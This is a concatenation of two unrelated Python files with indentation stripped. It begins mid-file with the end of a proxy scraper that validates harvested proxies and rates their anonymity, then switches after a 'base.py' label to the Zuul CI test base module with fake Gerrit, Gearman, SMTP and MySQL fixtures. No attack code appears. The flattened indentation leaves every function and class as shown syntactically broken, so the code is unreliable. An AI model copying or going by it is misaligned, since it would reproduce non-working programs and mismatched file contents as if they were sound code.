valid_proxies = []
queue = Queue()
if self.only_https:
schemes = ["https"]
else:
schemes = ["http", "https"]
for scheme in schemes:
for proxy in proxies:
queue.put((proxy, scheme))
self.threads = [Thread(target=self.validate_proxy,
name="ProxyValidator " + str(x),
args=(queue, valid_proxies))
for x in range(self.n_threads)]
for thread in self.threads:
thread.daemon = True
thread.start()
queue.join()
return valid_proxies
def _check_proxy_anonymity(self, response):
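# Classification: 'transparent' if our own IP leaks anywhere in the echoed response,
# 'anonymous' if a Via header reveals a proxy hop, otherwise 'high_anonymous'.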
via = response.get('headers', {}).get('Via', '')
if self.origin_ip in json.dumps(response):
return 'transparent'
elif via and via != "1.1 vegur":
return 'anonymous'
else:
return 'high_anonymous'
def _check_export_address(self, response):
origin = response.get('origin', '').split(', ')
if self.origin_ip in origin:
origin.remove(self.origin_ip)
return origin
# def _request_force_stop(self, signum, _):
# logger.warning("[-] Cold shut down")
#
# raise SystemExit()
# def _request_stop(self, signum, _):
# logger.debug("Got signal %s" % signal_name(signum))
#
# signal.signal(signal.SIGINT, self._request_force_stop)
# signal.signal(signal.SIGTERM, self._request_force_stop)
def init(self):
logger.debug("[*] Init")
# signal.signal(signal.SIGINT, self._request_stop)
# signal.signal(signal.SIGTERM, self._request_stop)
rp = requests.get('http://httpbin.org/get')
self.origin_ip = rp.json().get('origin', '')
logger.debug("[*] Current Ip Address: %s" % self.origin_ip)
self.geoip_reader = geoip2.database.Reader(
os.path.join(self.base_dir, 'data/GeoLite2-Country.mmdb'))
def validate_input_proxies(self):
logger.debug("[*] Validate input proxies")
self.valid_proxies = self._validate_proxy_list(self.input_proxies)
logger.debug("[*] Check %s input proxies, Got %s valid input proxies" %
(len(self.proxies_hash), len(self.valid_proxies)))
def load_plugins(self):
logger.debug("[*] Load plugins")
for plugin_name in os.listdir(os.path.join(self.base_dir, 'plugin')):
if os.path.splitext(plugin_name)[1] != '.py' or \
plugin_name in ['__init__.py', 'ip181.py', 'xicidaili.py']:
continue
try:
cls = load_object(
"getproxy.plugin.%s.Proxy" % os.path.splitext(
plugin_name)[0])
except Exception as e:
logger.warning("[-] Load Plugin %s error: %s" % (
plugin_name, str(e)))
continue
inst = cls()
inst.proxies = copy.deepcopy(self.valid_proxies)
self.plugins.append(inst)
def grab_web_proxies(self):
logger.debug("[*] Grab proxies")
threads = [Thread(target=plugin.start, args=())
for plugin in self.plugins]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join(600)
self._collect_result()
def validate_web_proxies(self):
logger.debug("[*] Validate web proxies")
input_proxies_len = len(self.proxies_hash)
valid_proxies = self._validate_proxy_list(self.web_proxies)
self.valid_proxies.extend(valid_proxies)
output_proxies_len = len(self.proxies_hash) - input_proxies_len
logger.info(
"[*] Check %s new proxies, Got %s valid new proxies" %
(output_proxies_len, len(valid_proxies)))
logger.info("[*] Check %s proxies, Got %s valid proxies" %
(len(self.proxies_hash), len(self.valid_proxies)))
def start(self):
self.init()
self.validate_input_proxies()
self.load_plugins()
self.grab_web_proxies()
self.validate_web_proxies()
return self.valid_proxies
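# Minimal usage sketch (network access and the bundled GeoLite2 database are assumed):
#   g = GetProxy(only_https=True, max_response_time=3, n_threads=50)
#   proxies = g.start()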
|
base.py
|
#!/usr/bin/env python
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import configparser as ConfigParser
import gc
import hashlib
import json
import logging
import os
import pprint
from six.moves import queue as Queue
from six.moves import urllib
import random
import re
import select
import shutil
from six.moves import reload_module
import socket
import string
import subprocess
import swiftclient
import threading
import time
import uuid
import git
import gear
import fixtures
import pymysql
import statsd
import testtools
from git import GitCommandError
import zuul.connection.gerrit
import zuul.connection.smtp
import zuul.connection.sql
import zuul.scheduler
import zuul.webapp
import zuul.rpclistener
import zuul.launcher.gearman
import zuul.lib.swift
import zuul.merger.client
import zuul.merger.merger
import zuul.merger.server
import zuul.reporter.gerrit
import zuul.reporter.smtp
import zuul.source.gerrit
import zuul.trigger.gerrit
import zuul.trigger.timer
import zuul.trigger.zuultrigger
FIXTURE_DIR = os.path.join(os.path.dirname(__file__),
'fixtures')
USE_TEMPDIR = True
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s')
def repack_repo(path):
cmd = ['git', '--git-dir=%s/.git' % path, 'repack', '-afd']
output = subprocess.Popen(cmd, close_fds=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = output.communicate()
if output.returncode:
raise Exception("git repack returned %d" % output.returncode)
return out
def random_sha1():
return hashlib.sha1(str(random.random()).encode('utf-8')).hexdigest()
def iterate_timeout(max_seconds, purpose):
start = time.time()
count = 0
while (time.time() < start + max_seconds):
count += 1
yield count
time.sleep(0)
raise Exception("Timeout waiting for %s" % purpose)
class ChangeReference(git.Reference):
_common_path_default = "refs/changes"
_points_to_commits_only = True
class FakeChange(object):
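# Maps category name -> (label name, minimum vote, maximum vote).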
categories = {'Approved': ('Approved', -1, 1),
'Code-Review': ('Code-Review', -2, 2),
'Verified': ('Verified', -2, 2)}
# TODO(tobiash): This is a translation layer for tests that still use
# lower-case label names. It can be removed once all tests
# are converted to use the correct casing.
categories_translation = {'approved': 'Approved',
'code-review': 'Code-Review',
'verified': 'Verified',
'Approved': 'Approved',
'Code-Review': 'Code-Review',
'Verified': 'Verified',
'CRVW': 'Code-Review',
'APRV': 'Approved',
'VRFY': 'Verified'}
def __init__(self, gerrit, number, project, branch, subject,
status='NEW', upstream_root=None):
self.gerrit = gerrit
self.reported = 0
self.queried = 0
self.patchsets = []
self.number = number
self.project = project
self.branch = branch
self.subject = subject
self.latest_patchset = 0
self.depends_on_change = None
self.needed_by_changes = []
self.fail_merge = False
self.messages = []
self.data = {
'branch': branch,
'comments': [],
'commitMessage': subject,
'createdOn': time.time(),
'id': 'I' + random_sha1(),
'lastUpdated': time.time(),
'number': str(number),
'open': status == 'NEW',
'owner': {'email': 'user@example.com',
'name': 'User Name',
'username': 'username'},
'patchSets': self.patchsets,
'project': project,
'status': status,
'subject': subject,
'submitRecords': [],
'url': 'https://hostname/%s' % number}
self.upstream_root = upstream_root
self.addPatchset()
self.data['submitRecords'] = self.getSubmitRecords()
self.open = status == 'NEW'
def add_fake_change_to_repo(self, msg, fn, large):
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
ref = ChangeReference.create(repo, '1/%s/%s' % (self.number,
self.latest_patchset),
'refs/tags/init')
repo.head.reference = ref
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
path = os.path.join(self.upstream_root, self.project)
if not large:
fn = os.path.join(path, fn)
f = open(fn, 'w')
f.write("test %s %s %s\n" %
(self.branch, self.number, self.latest_patchset))
f.close()
repo.index.add([fn])
else:
for fni in range(100):
fn = os.path.join(path, str(fni))
f = open(fn, 'w')
for ci in range(4096):
f.write(random.choice(string.printable))
f.close()
repo.index.add([fn])
r = repo.index.commit(msg)
repo.head.reference = 'master'
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
repo.heads['master'].checkout()
return r
def addPatchset(self, files=[], large=False):
self.latest_patchset += 1
if files:
fn = files[0]
else:
fn = '%s-%s' % (self.branch.replace('/', '_'), self.number)
msg = self.subject + '-' + str(self.latest_patchset)
c = self.add_fake_change_to_repo(msg, fn, large)
ps_files = [{'file': '/COMMIT_MSG',
'type': 'ADDED'},
{'file': 'README',
'type': 'MODIFIED'}]
for f in files:
ps_files.append({'file': f, 'type': 'ADDED'})
d = {'approvals': [],
'createdOn': time.time(),
'files': ps_files,
'number': str(self.latest_patchset),
'ref': 'refs/changes/1/%s/%s' % (self.number,
self.latest_patchset),
'revision': c.hexsha,
'uploader': {'email': 'user@example.com',
'name': 'User name',
'username': 'user'}}
self.data['currentPatchSet'] = d
self.patchsets.append(d)
self.data['submitRecords'] = self.getSubmitRecords()
def getPatchsetCreatedEvent(self, patchset):
event = {"type": "patchset-created",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"uploader": {"name": "User Name"}}
return event
def getChangeRestoredEvent(self):
event = {"type": "change-restored",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"restorer": {"name": "User Name"},
"patchSet": self.patchsets[-1],
"reason": ""}
return event
def getChangeAbandonedEvent(self):
event = {"type": "change-abandoned",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"abandoner": {"name": "User Name"},
"patchSet": self.patchsets[-1],
"reason": ""}
return event
def getChangeCommentEvent(self, patchset):
event = {"type": "comment-added",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"author": {"name": "User Name"},
"approvals": [{"type": "Code-Review",
"description": "Code-Review",
"value": "0"}],
"comment": "This is a comment"}
return event
def getRefUpdatedEvent(self):
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
oldrev = repo.heads[self.branch].commit.hexsha
event = {
"type": "ref-updated",
"submitter": {
"name": "User Name",
},
"refUpdate": {
"oldRev": oldrev,
"newRev": self.patchsets[-1]['revision'],
"refName": self.branch,
"project": self.project,
}
}
return event
def addApproval(self, category, value, username='reviewer_john',
granted_on=None, message=''):
if not granted_on:
granted_on = time.time()
approval = {
'description': self.categories_translation[category],
'type': self.categories_translation[category],
'value': str(value),
'by': {
'username': username,
'email': username + '@example.com',
},
'grantedOn': int(granted_on)
}
for i, x in enumerate(self.patchsets[-1]['approvals'][:]):
if x['by']['username'] == username and \
x['type'] == self.categories_translation[category]:
del self.patchsets[-1]['approvals'][i]
self.patchsets[-1]['approvals'].append(approval)
event = {'approvals': [approval],
'author': {'email': 'author@example.com',
'name': 'Patchset Author',
'username': 'author_phil'},
'change': {'branch': self.branch,
'id': 'Iaa69c46accf97d0598111724a38250ae76a22c87',
'number': str(self.number),
'owner': {'email': 'owner@example.com',
'name': 'Change Owner',
'username': 'owner_jane'},
'project': self.project,
'subject': self.subject,
'topic': 'master',
'url': 'https://hostname/459'},
'comment': message,
'patchSet': self.patchsets[-1],
'type': 'comment-added'}
self.data['submitRecords'] = self.getSubmitRecords()
return json.loads(json.dumps(event))
def getSubmitRecords(self):
status = {}
for cat in self.categories.keys():
status[cat] = 0
for a in self.patchsets[-1]['approvals']:
cur = status[a['type']]
cat_min, cat_max = self.categories[a['type']][1:]
new = int(a['value'])
if new == cat_min:
cur = new
elif abs(new) > abs(cur):
cur = new
status[a['type']] = cur
labels = []
ok = True
for typ, cat in self.categories.items():
cur = status[typ]
cat_min, cat_max = cat[1:]
if cur == cat_min:
value = 'REJECT'
ok = False
elif cur == cat_max:
value = 'OK'
else:
value = 'NEED'
ok = False
labels.append({'label': cat[0], 'status': value})
if ok:
return [{'status': 'OK'}]
return [{'status': 'NOT_READY',
'labels': labels}]
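# Illustrative shape of the NOT_READY record returned above:
#   [{'status': 'NOT_READY',
#     'labels': [{'label': 'Verified', 'status': 'NEED'}, ...]}]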
def setDependsOn(self, other, patchset):
self.depends_on_change = other
d = {'id': other.data['id'],
'number': other.data['number'],
'ref': other.patchsets[patchset - 1]['ref']
}
self.data['dependsOn'] = [d]
other.needed_by_changes.append(self)
needed = other.data.get('neededBy', [])
d = {'id': self.data['id'],
'number': self.data['number'],
'ref': self.patchsets[patchset - 1]['ref'],
'revision': self.patchsets[patchset - 1]['revision']
}
needed.append(d)
other.data['neededBy'] = needed
def query(self):
self.queried += 1
d = self.data.get('dependsOn')
if d:
d = d[0]
if (self.depends_on_change.patchsets[-1]['ref'] == d['ref']):
d['isCurrentPatchSet'] = True
else:
d['isCurrentPatchSet'] = False
return json.loads(json.dumps(self.data))
def setMerged(self):
if (self.depends_on_change and
self.depends_on_change.data['status'] != 'MERGED'):
return
if self.fail_merge:
return
self.data['status'] = 'MERGED'
self.open = False
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
repo.heads[self.branch].commit = \
repo.commit(self.patchsets[-1]['revision'])
def setReported(self):
self.reported += 1
class FakeGerritConnection(zuul.connection.gerrit.GerritConnection):
log = logging.getLogger("zuul.test.FakeGerritConnection")
def __init__(self, connection_name, connection_config,
changes_db=None, queues_db=None, upstream_root=None):
super(FakeGerritConnection, self).__init__(connection_name,
connection_config)
self.event_queue = queues_db
self.fixture_dir = os.path.join(FIXTURE_DIR, 'gerrit')
self.change_number = 0
self.changes = changes_db
self.queries = []
self.upstream_root = upstream_root
def addFakeChange(self, project, branch, subject, status='NEW'):
self.change_number += 1
c = FakeChange(self, self.change_number, project, branch, subject,
upstream_root=self.upstream_root,
status=status)
self.changes[self.change_number] = c
return c
def review(self, project, changeid, message, action):
number, ps = changeid.split(',')
change = self.changes[int(number)]
# Add the approval back onto the change (i.e. simulate what Gerrit would
# do).
# Usually when zuul leaves a review it'll create a feedback loop where
# zuul's review enters another gerrit event (which is then picked up by
# zuul). However, we can't mimic this behaviour (by adding this
# approval event into the queue) as it stops jobs from checking what
# happens before this event is triggered. If a job needs to see what
# happens they can add their own verified event into the queue.
# Nevertheless, we can update change with the new review in gerrit.
for cat in ['CRVW', 'VRFY', 'APRV']:
if cat in action:
change.addApproval(cat, action[cat], username=self.user)
if 'label' in action:
parts = action['label'].split('=')
change.addApproval(parts[0], parts[2], username=self.user)
change.messages.append(message)
if 'submit' in action:
change.setMerged()
if message:
change.setReported()
def query(self, number):
change = self.changes.get(int(number))
if change:
return change.query()
return {}
def simpleQuery(self, query):
self.log.debug("simpleQuery: %s" % query)
self.queries.append(query)
if query.startswith('change:'):
# Query a specific changeid
changeid = query[len('change:'):]
l = [change.query() for change in self.changes.values()
if change.data['id'] == changeid]
elif query.startswith('message:'):
# Query the content of a commit message
msg = query[len('message:'):].strip()
l = [change.query() for change in self.changes.values()
if msg in change.data['commitMessage']]
else:
# Query all open changes
l = [change.query() for change in self.changes.values()]
return l
def _start_watcher_thread(self, *args, **kw):
pass
def getGitUrl(self, project):
return os.path.join(self.upstream_root, project.name)
class BuildHistory(object):
def __init__(self, **kw):
self.__dict__.update(kw)
def __repr__(self):
return ("<Completed build, result: %s name: %s #%s changes: %s>" %
(self.result, self.name, self.number, self.changes))
class FakeURLOpener(object):
def __init__(self, upstream_root, url):
self.upstream_root = upstream_root
self.url = url
def read(self):
res = urllib.parse.urlparse(self.url)
path = res.path
project = '/'.join(path.split('/')[2:-2])
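# Emulate git's smart-HTTP info/refs advertisement: each pkt-line is prefixed
# with its own length as four hex digits (the '%04x' below), and '0000' is the
# terminating flush packet.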
ret = '001e# service=git-upload-pack\n'
ret += ('000000a31270149696713ba7e06f1beb760f20d359c4abed HEAD\x00'
'multi_ack thin-pack side-band side-band-64k ofs-delta '
'shallow no-progress include-tag multi_ack_detailed no-done\n')
path = os.path.join(self.upstream_root, project)
repo = git.Repo(path)
for ref in repo.refs:
r = ref.object.hexsha + ' ' + ref.path + '\n'
ret += '%04x%s' % (len(r) + 4, r)
ret += '0000'
return ret
class FakeStatsd(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('', 0))
self.port = self.sock.getsockname()[1]
self.wake_read, self.wake_write = os.pipe()
self.stats = []
def run(self):
while True:
poll = select.poll()
poll.register(self.sock, select.POLLIN)
poll.register(self.wake_read, select.POLLIN)
ret = poll.poll()
for (fd, event) in ret:
if fd == self.sock.fileno():
data = self.sock.recvfrom(1024)
if not data:
return
self.stats.append(data[0])
if fd == self.wake_read:
return
def stop(self):
os.write(self.wake_write, b'1\n')
class FakeBuild(threading.Thread):
log = logging.getLogger("zuul.test")
def __init__(self, worker, job, number, node):
threading.Thread.__init__(self)
self.daemon = True
self.worker = worker
self.job = job
self.name = job.name.split(':')[1]
self.number = number
self.node = node
self.parameters = json.loads(job.arguments)
self.unique = self.parameters['ZUUL_UUID']
self.wait_condition = threading.Condition()
self.waiting = False
self.aborted = False
self.requeue = False
self.created = time.time()
self.description = ''
self.run_error = False
def release(self):
self.wait_condition.acquire()
self.wait_condition.notify()
self.waiting = False
self.log.debug("Build %s released" % self.unique)
self.wait_condition.release()
def isWaiting(self):
self.wait_condition.acquire()
if self.waiting:
ret = True
else:
ret = False
self.wait_condition.release()
return ret
def _wait(self):
self.wait_condition.acquire()
self.waiting = True
self.log.debug("Build %s waiting" % self.unique)
self.wait_condition.wait()
self.wait_condition.release()
def run(self):
data = {
'url': 'https://server/job/%s/%s/' % (self.name, self.number),
'name': self.name,
'number': self.number,
'manager': self.worker.worker_id,
'worker_name': 'My Worker',
'worker_hostname': 'localhost',
'worker_ips': ['127.0.0.1', '192.168.1.1'],
'worker_fqdn': 'zuul.example.org',
'worker_program': 'FakeBuilder',
'worker_version': 'v1.1',
'worker_extra': {'something': 'else'}
}
self.log.debug('Running build %s' % self.unique)
self.job.sendWorkData(json.dumps(data))
self.log.debug('Sent WorkData packet with %s' % json.dumps(data))
self.job.sendWorkStatus(0, 100)
if self.worker.hold_jobs_in_build:
self.log.debug('Holding build %s' % self.unique)
self._wait()
self.log.debug("Build %s continuing" % self.unique)
self.worker.lock.acquire()
result = 'SUCCESS'
if (('ZUUL_REF' in self.parameters) and
self.worker.shouldFailTest(self.name,
self.parameters['ZUUL_REF'])):
result = 'FAILURE'
if self.aborted:
result = 'ABORTED'
if self.requeue:
result = None
if self.run_error:
work_fail = True
result = 'RUN_ERROR'
else:
data['result'] = result
data['node_labels'] = ['bare-necessities']
data['node_name'] = 'foo'
work_fail = False
changes = None
if 'ZUUL_CHANGE_IDS' in self.parameters:
changes = self.parameters['ZUUL_CHANGE_IDS']
self.worker.build_history.append(
BuildHistory(name=self.name, number=self.number,
result=result, changes=changes, node=self.node,
uuid=self.unique, description=self.description,
parameters=self.parameters,
pipeline=self.parameters['ZUUL_PIPELINE'])
)
self.job.sendWorkData(json.dumps(data))
if work_fail:
self.job.sendWorkFail()
else:
self.job.sendWorkComplete(json.dumps(data))
del self.worker.gearman_jobs[self.job.unique]
self.worker.running_builds.remove(self)
self.worker.lock.release()
class FakeWorker(gear.Worker):
def __init__(self, worker_id, test):
super(FakeWorker, self).__init__(worker_id)
self.gearman_jobs = {}
self.build_history = []
self.running_builds = []
self.build_counter = 0
self.fail_tests = {}
self.test = test
self.hold_jobs_in_build = False
self.lock = threading.Lock()
self.__work_thread = threading.Thread(target=self.work)
self.__work_thread.daemon = True
self.__work_thread.start()
def handleJob(self, job):
parts = job.name.split(":")
cmd = parts[0]
name = parts[1]
if len(parts) > 2:
node = parts[2]
else:
node = None
if cmd == 'build':
self.handleBuild(job, name, node)
elif cmd == 'stop':
self.handleStop(job, name)
elif cmd == 'set_description':
self.handleSetDescription(job, name)
def handleBuild(self, job, name, node):
build = FakeBuild(self, job, self.build_counter, node)
job.build = build
self.gearman_jobs[job.unique] = job
self.build_counter += 1
self.running_builds.append(build)
build.start()
def handleStop(self, job, name):
self.log.debug("handle stop")
parameters = json.loads(job.arguments)
name = parameters['name']
number = parameters['number']
for build in self.running_builds:
if build.name == name and build.number == number:
build.aborted = True
build.release()
job.sendWorkComplete()
return
job.sendWorkFail()
def handleSetDescription(self, job, name):
self.log.debug("handle set description")
parameters = json.loads(job.arguments)
name = parameters['name']
number = parameters['number']
descr = parameters['html_description']
for build in self.running_builds:
if build.name == name and build.number == number:
build.description = descr
job.sendWorkComplete()
return
for build in self.build_history:
if build.name == name and build.number == number:
build.description = descr
job.sendWorkComplete()
return
job.sendWorkFail()
def work(self):
while self.running:
try:
job = self.getJob()
except gear.InterruptedError:
continue
try:
self.handleJob(job)
except Exception:
self.log.exception("Worker exception:")
def addFailTest(self, name, change):
l = self.fail_tests.get(name, [])
l.append(change)
self.fail_tests[name] = l
def shouldFailTest(self, name, ref):
l = self.fail_tests.get(name, [])
for change in l:
if self.test.ref_has_change(ref, change):
return True
return False
def release(self, regex=None):
builds = self.running_builds[:]
self.log.debug("releasing build %s (%s)" % (regex,
len(self.running_builds)))
for build in builds:
if not regex or re.match(regex, build.name):
self.log.debug("releasing build %s" %
(build.parameters['ZUUL_UUID']))
build.release()
else:
self.log.debug("not releasing build %s" %
(build.parameters['ZUUL_UUID']))
self.log.debug("done releasing builds %s (%s)" %
(regex, len(self.running_builds)))
class FakeGearmanServer(gear.Server):
def __init__(self):
self.hold_jobs_in_queue = False
super(FakeGearmanServer, self).__init__(0)
def getJobForConnection(self, connection, peek=False):
for queue in [self.high_queue, self.normal_queue, self.low_queue]:
for job in queue:
if not hasattr(job, 'waiting'):
if job.name.startswith('build:'):
job.waiting = self.hold_jobs_in_queue
else:
job.waiting = False
if job.waiting:
continue
if job.name in connection.functions:
if not peek:
queue.remove(job)
connection.related_jobs[job.handle] = job
job.worker_connection = connection
job.running = True
return job
return None
def release(self, regex=None):
released = False
qlen = (len(self.high_queue) + len(self.normal_queue) +
len(self.low_queue))
self.log.debug("releasing queued job %s (%s)" % (regex, qlen))
for job in self.getQueue():
cmd, name = job.name.split(':')
if cmd != 'build':
continue
if not regex or re.match(regex, name):
self.log.debug("releasing queued job %s" %
job.unique)
job.waiting = False
released = True
else:
self.log.debug("not releasing queued job %s" %
job.unique)
if released:
self.wakeConnections()
qlen = (len(self.high_queue) + len(self.normal_queue) +
len(self.low_queue))
self.log.debug("done releasing queued jobs %s (%s)" % (regex, qlen))
class FakeSMTP(object):
log = logging.getLogger('zuul.FakeSMTP')
def __init__(self, messages, server, port):
self.server = server
self.port = port
self.messages = messages
def sendmail(self, from_email, to_email, msg):
self.log.info("Sending email from %s, to %s, with msg %s" % (
from_email, to_email, msg))
headers = msg.split('\n\n', 1)[0]
body = msg.split('\n\n', 1)[1]
self.messages.append(dict(
from_email=from_email,
to_email=to_email,
msg=msg,
headers=headers,
body=body,
))
return True
def quit(self):
return True
class FakeSwiftClientConnection(swiftclient.client.Connection):
def post_account(self, headers):
# Do nothing
pass
def get_auth(self):
# Returns endpoint and (unused) auth token
endpoint = os.path.join('https://storage.example.org', 'V1',
'AUTH_account')
return endpoint, ''
class MySQLSchemaFixture(fixtures.Fixture):
def setUp(self):
super(MySQLSchemaFixture, self).setUp()
random_bits = ''.join(random.choice(string.ascii_lowercase +
string.ascii_uppercase)
for x in range(8))
self.name = '%s_%s' % (random_bits, os.getpid())
self.passwd = uuid.uuid4().hex
db = pymysql.connect(host="localhost",
user="openstack_citest",
passwd="openstack_citest",
db="openstack_citest")
cur = db.cursor()
cur.execute("create database %s" % self.name)
cur.execute(
"grant all on %s.* to '%s'@'localhost' identified by '%s'" %
(self.name, self.name, self.passwd))
cur.execute("flush privileges")
self.dburi = 'mysql+pymysql://%s:%s@localhost/%s' % (self.name,
self.passwd,
self.name)
self.addDetail('dburi', testtools.content.text_content(self.dburi))
self.addCleanup(self.cleanup)
def cleanup(self):
db = pymysql.connect(host="localhost",
user="openstack_citest",
passwd="openstack_citest",
db="openstack_citest")
cur = db.cursor()
cur.execute("drop database %s" % self.name)
cur.execute("drop user '%s'@'localhost'" % self.name)
cur.execute("flush privileges")
class BaseTestCase(testtools.TestCase):
log = logging.getLogger("zuul.test")
def setUp(self):
super(BaseTestCase, self).setUp()
test_timeout = os.environ.get('OS_TEST_TIMEOUT', 0)
try:
test_timeout = int(test_timeout)
except ValueError:
# If timeout value is invalid do not set a timeout.
test_timeout = 0
if test_timeout > 0:
self.useFixture(fixtures.Timeout(test_timeout, gentle=False))
if (os.environ.get('OS_STDOUT_CAPTURE') == 'True' or
os.environ.get('OS_STDOUT_CAPTURE') == '1'):
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
if (os.environ.get('OS_STDERR_CAPTURE') == 'True' or
os.environ.get('OS_STDERR_CAPTURE') == '1'):
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
if (os.environ.get('OS_LOG_CAPTURE') == 'True' or
os.environ.get('OS_LOG_CAPTURE') == '1'):
log_level = logging.DEBUG
if os.environ.get('OS_LOG_LEVEL') == 'DEBUG':
log_level = logging.DEBUG
elif os.environ.get('OS_LOG_LEVEL') == 'INFO':
log_level = logging.INFO
elif os.environ.get('OS_LOG_LEVEL') == 'WARNING':
log_level = logging.WARNING
elif os.environ.get('OS_LOG_LEVEL') == 'ERROR':
log_level = logging.ERROR
elif os.environ.get('OS_LOG_LEVEL') == 'CRITICAL':
log_level = logging.CRITICAL
self.useFixture(fixtures.FakeLogger(
level=log_level,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s'))
# NOTE(notmorgan): Extract logging overrides for specific libraries
# from the OS_LOG_DEFAULTS env and create FakeLogger fixtures for
# each. This is used to limit the output during test runs from
# libraries that zuul depends on such as gear.
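# Example value (illustrative only, matching the name=LEVEL,... parsing below):
#   OS_LOG_DEFAULTS="gear.Server=WARNING,git.cmd=INFO"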
log_defaults_from_env = os.environ.get('OS_LOG_DEFAULTS')
if log_defaults_from_env:
for default in log_defaults_from_env.split(','):
try:
name, level_str = default.split('=', 1)
level = getattr(logging, level_str, logging.DEBUG)
self.useFixture(fixtures.FakeLogger(
name=name,
level=level,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s'))
except ValueError:
# NOTE(notmorgan): Invalid format of the log default,
# skip and don't try and apply a logger for the
# specified module
pass
class ZuulTestCase(BaseTestCase):
def setUp(self):
super(ZuulTestCase, self).setUp()
if USE_TEMPDIR:
tmp_root = self.useFixture(fixtures.TempDir(
rootdir=os.environ.get("ZUUL_TEST_ROOT"))
).path
else:
tmp_root = os.environ.get("ZUUL_TEST_ROOT")
self.test_root = os.path.join(tmp_root, "zuul-test")
self.upstream_root = os.path.join(self.test_root, "upstream")
self.git_root = os.path.join(self.test_root, "git")
self.state_root = os.path.join(self.test_root, "lib")
if os.path.exists(self.test_root):
shutil.rmtree(self.test_root)
os.makedirs(self.test_root)
os.makedirs(self.upstream_root)
os.makedirs(self.state_root)
# Make per test copy of Configuration.
self.setup_config()
self.config.set('zuul', 'layout_config',
os.path.join(FIXTURE_DIR,
self.config.get('zuul', 'layout_config')))
self.config.set('merger', 'git_dir', self.git_root)
self.config.set('zuul', 'state_dir', self.state_root)
# For each project in config:
self.init_repo("org/project")
self.init_repo("org/project1")
self.init_repo("org/project2")
self.init_repo("org/project3")
self.init_repo("org/project4")
self.init_repo("org/project5")
self.init_repo("org/project6")
self.init_repo("org/one-job-project")
self.init_repo("org/nonvoting-project")
self.init_repo("org/templated-project")
self.init_repo("org/layered-project")
self.init_repo("org/node-project")
self.init_repo("org/conflict-project")
self.init_repo("org/noop-project")
self.init_repo("org/experimental-project")
self.init_repo("org/no-jobs-project")
self.statsd = FakeStatsd()
# note, use 127.0.0.1 rather than localhost to avoid getting ipv6
# see: https://github.com/jsocol/pystatsd/issues/61
os.environ['STATSD_HOST'] = '127.0.0.1'
os.environ['STATSD_PORT'] = str(self.statsd.port)
self.statsd.start()
# the statsd client object is configured in the statsd module import
reload_module(statsd)
reload_module(zuul.scheduler)
self.gearman_server = FakeGearmanServer()
self.config.set('gearman', 'port', str(self.gearman_server.port))
self.worker = FakeWorker('fake_worker', self)
self.worker.addServer('127.0.0.1', self.gearman_server.port)
self.gearman_server.worker = self.worker
zuul.source.gerrit.GerritSource.replication_timeout = 1.5
zuul.source.gerrit.GerritSource.replication_retry_interval = 0.5
zuul.connection.gerrit.GerritEventConnector.delay = 0.0
self.sched = zuul.scheduler.Scheduler(self.config)
self.useFixture(fixtures.MonkeyPatch('swiftclient.client.Connection',
FakeSwiftClientConnection))
self.swift = zuul.lib.swift.Swift(self.config)
self.event_queues = [
self.sched.result_event_queue,
self.sched.trigger_event_queue
]
self.configure_connections()
self.sched.registerConnections(self.connections)
def URLOpenerFactory(*args, **kw):
if isinstance(args[0], urllib.request.Request):
return old_urlopen(*args, **kw)
return FakeURLOpener(self.upstream_root, *args, **kw)
old_urlopen = urllib.request.urlopen
urllib.request.urlopen = URLOpenerFactory
self.merge_server = zuul.merger.server.MergeServer(self.config,
self.connections)
self.merge_server.start()
self.launcher = zuul.launcher.gearman.Gearman(self.config, self.sched,
self.swift)
self.merge_client = zuul.merger.client.MergeClient(
self.config, self.sched)
self.sched.setLauncher(self.launcher)
self.sched.setMerger(self.merge_client)
self.webapp = zuul.webapp.WebApp(
self.sched, port=0, listen_address='127.0.0.1')
self.rpc = zuul.rpclistener.RPCListener(self.config, self.sched)
self.sched.start()
self.sched.reconfigure(self.config)
self.sched.resume()
self.webapp.start()
self.rpc.start()
self.launcher.gearman.waitForServer()
self.registerJobs()
self.builds = self.worker.running_builds
self.history = self.worker.build_history
self.addCleanup(self.assertFinalState)
self.addCleanup(self.shutdown)
def configure_connections(self):
# TODO(jhesketh): This should come from lib.connections for better
# coverage
# Register connections from the config
